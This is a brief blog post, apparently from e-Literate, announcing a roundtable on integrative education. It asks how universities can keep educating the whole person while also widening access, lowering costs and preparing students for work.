Very little thought is going into other valuable contributions that universities have provided in the past. Universities also produce future citizens, problem–solvers, leaders – not to mention knowledge that can drive innovation and economic growth. How do we ensure that these other critical outcomes will continue in the future? How can we build on new insights about learning and invent new ways to deliver and measure education that matters for a lifetime? How can we use new tools and approaches that are only available now to carry out the mission of educating for the whole person even better than before?

For the roundtable tomorrow, we’ll discuss:

What are the opportunities for shaping public policy for integrative education in a world that also needs more access, lower costs and workplace preparation? How do we ensure this focus is not elitist?

You can access the discussion on the Reinventors website here.

You can access the discussion within Google+ here.

The post Roundtable Discussion on Integrative Education July 9th at 2pm EDT appeared first on e-Literate.